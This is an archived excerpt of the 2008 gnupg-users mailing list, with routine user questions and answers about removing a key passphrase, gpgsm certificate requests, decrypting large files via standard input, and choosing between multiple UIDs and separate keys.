nK5xL2szMjmXQoBcO+clfWgtS08734ZFGSxezE8DlVTqaCHGMMuMxBkegNgdIeSz M7aU/4dHmZDqmBEso/66bVWtGgilPKVOv2ckkEbs8DSe3UcgThECGxUgmqE3m8X9 U3jESnDdUpemV/UNBbxOfiIpvx8IwZOx4uGC0BkDvBiL83rPmlnFEChksEuDu+IU BEd4rcYQB0K2R5URymeWC/nbeiR2WOIA3gtGYkIzCVr0CAWPhB6lWDmPYC85vIqo MNU2IkYk/KdrwisVWNifMziz0VNen/OBAhaOxlugKvlysbiqe+CQ+eWQrUPly8g= =ZvPh -----END PGP SIGNATURE----- From naeem.m.afzal at intel.com Sun Jun 29 00:13:04 2008 From: naeem.m.afzal at intel.com (Afzal, Naeem M) Date: Sat, 28 Jun 2008 15:13:04 -0700 Subject: why we need passphrase In-Reply-To: <48667E0C.104@gmail.com> References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com> Message-ID: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com> How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough? Thanks naeem >-----Original Message----- >From: gnupg-users-bounces at gnupg.org [mailto:gnupg-users-bounces at gnupg.org] >On Behalf Of Faramir >Sent: Saturday, June 28, 2008 11:08 AM >To: gnupg-users at gnupg.org >Subject: Re: why we need passphrase > > Because the key itself is protected by a passphrase. You CAN remove >that protection, and you can even generate keys without passphrase.. but >the idea is, if you have to go to the bathroom, and someone else tries >to read your messages, or steal your key... the thief won't have much >luck, since if the passphrase is strong, he wont be able to activate the >key... unless the thief is lucky enough to "guess" the passphrase >hitting the keyboard randomly... > > A good passphrase would make bruteforce attack infeasible, it won't be >in any dictionary (so dictionary attacks won't work)... so, if you >remove the passphrase, you'll want to take extra measures to avoid >problems... but maybe you know nobody is going to touch your computer... > From faramir.cl at gmail.com Sun Jun 29 05:29:00 2008 From: faramir.cl at gmail.com (Faramir) Date: Sat, 28 Jun 2008 23:29:00 -0400 Subject: why we need passphrase In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com> References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com> <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com> Message-ID: <4867017C.5070403@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Afzal, Naeem M escribi?: > How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough? The public key is never protected by the passphrase ( *as far as I know* I may be wrong), so anyway it should be safe to upload it. To remove the passphrase... _I think_ the command is: gpg --edit-key 12WP8CAQ (12WP8CAQ must be replaced by your key's ID) (enter) passwd (enter) then it should ask your passphrase, and then ask you to enter the new passphrase (it ask it 2 times, as usual, to be sure you are not mistyping it) I figure if you don't hit any key, and answer by hitting "enter", it should assume you want a blank passphrase... But don't belive too much, I seldom use command line with gpg (I manage my keys from GPGkeys or Enigmail), and certainly, I have never removed a passphrase... There are expert people in this list (actually, developers), advanced users, and I am just a new user, so I still have a lot to learn about this. Best Regards P.S: always backup your key, or at least, make a revocation certificate... just in case you need to revoke it and make a new one... >> -----Original Message----- >> From: gnupg-users-bounces at gnupg.org [mailto:gnupg-users-bounces at gnupg.org] >> On Behalf Of Faramir >> Sent: Saturday, June 28, 2008 11:08 AM >> To: gnupg-users at gnupg.org >> Subject: Re: why we need passphrase >> >> Because the key itself is protected by a passphrase. You CAN remove >> that protection, and you can even generate keys without passphrase.. but >> the idea is, if you have to go to the bathroom, and someone else tries >> to read your messages, or steal your key... the thief won't have much >> luck, since if the passphrase is strong, he wont be able to activate the >> key... unless the thief is lucky enough to "guess" the passphrase >> hitting the keyboard randomly... .... -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIZwF8AAoJEMV4f6PvczxAyrAH/2WzlEn74SO/A1EBiNOFj5yy 56u1F9XL+RRos6jm/BQpZAbSKWA18Em06wapSrJHd5vvpLJwjLLuk90MEcAlZxGg tqibxHDO4x8hQB7XDWMuCL3dzKQ3858SdlxSCNChAI/gRGu6IT/an/stNtziRPmq ot3AhvOcJjkcBj3dIPrht9MmyYivEmmo6eIQbHHXM3KXL0OCqWT3sM/wfk5HFLhq 7/+dKKGkGanWUUNaxINwURtwkP3X75fHYbRr7B/ueamzfC/0PHmRPTZrKX8PZZD1 288VjUU6vyDAFV27h50D7ESwETZ8QGAAM+tFfoghYTgpSvJ1i1zKFGjmbgyk52g= =e32l -----END PGP SIGNATURE----- From faramir.cl at gmail.com Sun Jun 29 05:34:54 2008 From: faramir.cl at gmail.com (Faramir) Date: Sat, 28 Jun 2008 23:34:54 -0400 Subject: why we need passphrase (I forgot something important in the prev procedure) In-Reply-To: <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com> References: <821A1558D8819A4BB700FFF265F6781F0646C07C@orsmsx505.amr.corp.intel.com> <48667E0C.104@gmail.com> <821A1558D8819A4BB700FFF265F6781F0646C102@orsmsx505.amr.corp.intel.com> Message-ID: <486702DE.8060300@gmail.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256 Afzal, Naeem M escribi?: > How can I remove this restriction where I don't have to provide passphrase and public key itself is good enough? > > Thanks > naeem I forgot a very important thing: after changing you passphrase, probably you will have to give gpg the "save" command in order to actually make the changes.... or maybe in this case, it is no needed... but if you nottice gpg is still waiting for you to do something.. probably it is waiting for the save command. Regards -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iQEcBAEBCAAGBQJIZwLdAAoJEMV4f6PvczxA5qIH/2zv9VZP+vlJ5/kaUP91Kgsb rctqsgxu6qVYGlz8XElP0vcMqdHTUlRUmAn8/zxZtbbAr9SBVVxptFWNInOLlXsy WozMsi7vtO2A9/ZLaV7s173U2GmnMnnt4hdMXlX6e1Jl7TCQ/BQkosUMmkTj87vH IEdFsNHXtdsMEjiPhCYwRFRjcQ/EbuWvZgx70F/wmLL/QUVCFujEU4nUsmqdEFoF Mvf6F3aWcxc0GqgmdvHwkRX1N8gKdCeovI+SzL5eUtO7BySSchyxg7StU0W3t4rc +jvnXasJrCxR7HBQarE+CsK66EqaYTAntwd6qXW5dkrrNKoBwGHP1QLrL/SHscg= =Af9k -----END PGP SIGNATURE----- From kloecker at kde.org Sun Jun 29 12:10:17 2008 From: kloecker at kde.org (Ingo =?iso-8859-1?q?Kl=F6cker?=) Date: Sun, 29 Jun 2008 12:10:17 +0200 Subject: A small question about GnuPG 2 In-Reply-To: <48667BD4.7090703@gmail.com> References: <48667BD4.7090703@gmail.com> Message-ID: <200806291210.18180@erwin.ingo-kloecker.de> On Saturday 28 June 2008, Faramir wrote: > Well, as far as I know, it adds support for s/MIME... and if I am not > wrong, that would mean certificates like the ones issued by CAcert, > Comodo, et all... But, is GnuPG capable of generating those > certificates? Or we will still require OpenSSL or equivalent to make > them? GnuPG 2 includes a script called gpgsm-gencert.sh that can be used to generate an X.509 certificate request. I don't think gpgsm can be used to generate certificates; from gpgsm's man page: ===== --gen-key This command will only print an error message and direct the user to the gpgsm-gencert.sh script. ===== Regards, Ingo -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 194 bytes Desc: This is a digitally signed message part. URL: From ajay.madamala at gmail.com Sun Jun 29 13:12:00 2008 From: ajay.madamala at gmail.com (ajay Madamala) Date: Sun, 29 Jun 2008 16:42:00 +0530 Subject: Problem in case decrypting large file size Message-ID: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com> Hello all Currently we are working on GPG implementation in project with Java integration.GPG commands will be called by Java code at runtime. However, we were not able to test decryption via java code if source file was >2kb size..Please advice me how to overcome this case...Inputs are more helpful... Thanks -------------- next part -------------- An HTML attachment was scrubbed... URL: From roam at ringlet.net Mon Jun 30 12:56:48 2008 From: roam at ringlet.net (Peter Pentchev) Date: Mon, 30 Jun 2008 13:56:48 +0300 Subject: Problem in case decrypting large file size In-Reply-To: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com> References: <5fb810f80806290412r4b443774tbf7e1fdff8cba3aa@mail.gmail.com> Message-ID: <20080630105648.GA1092@straylight.m.ringlet.net> On Sun, Jun 29, 2008 at 04:42:00PM +0530, ajay Madamala wrote: > Hello all > > Currently we are working on GPG implementation in project with Java > integration.GPG commands will be called by Java code at runtime. However, we > were not able to test decryption via java code if source file was >2kb > size..Please advice me how to overcome this case...Inputs are more > helpful... Assuming you meant two *giga*bytes, not two kilobytes, I think the most common work-around is to pass the encrypted data on gpg's standard input and read the decrypted data from its standard output. That is, instead of doing something like: gpg -d file.txt.enc and expecting to get a file.txt after a successful decryption, do this: gpg -d < file.txt.enc > file.txt Of course, the exact invocation depends on your programming language, libraries and stuff (you may invoke a shell and pass it this command with the redirections, or you may fork off a process and reopen its file descripts 0 and 1, or...), but that's the general idea. Hope that helps. G'luck, Peter -- Peter Pentchev roam at ringlet.net roam at cnsys.bg roam at FreeBSD.org PGP key: http://people.FreeBSD.org/~roam/roam.key.asc Key fingerprint FDBA FD79 C26F 3C51 C95E DF9E ED18 B68D 1619 4553 This sentence claims to be an Epimenides paradox, but it is lying. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 195 bytes Desc: not available URL: From josh.cepek at usa.net Mon Jun 30 19:13:30 2008 From: josh.cepek at usa.net (Josh Cepek) Date: Mon, 30 Jun 2008 12:13:30 -0500 Subject: Multiple uid's vs. multiple primary keys & "master signing keys" In-Reply-To: References: Message-ID: <4869143A.7010003@usa.net> David Koppenhofer wrote: > 1) Multiple uid's (emails) per primary key versus multiple primary keys > I have 3 email addresses I currently use: one personal, one for foss > development, and one for work. I could create 3 uid's associated with > the same primary key (option A), or 3 separate primary keys with 1 uid > each (option B). > [.. cut ..] > * Option A has 1 encryption key, B has 3. In the 3-key scenario, if > I'm forced to reveal encrypted messages to one of the addresses, the > others are not automatically compromised. Generally those who use GPG never intend to provide a 3rd party access to an encrypted message. However, in the event you find yourself forced to disclose a message or face legal consequences, you have the option to disclose a specific message encrypted to you without providing your private key. The --show-session-key option will provide the static key used for encrypting that message without compromising any past or future content encrypted with that key. -- Josh -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 197 bytes Desc: OpenPGP digital signature URL: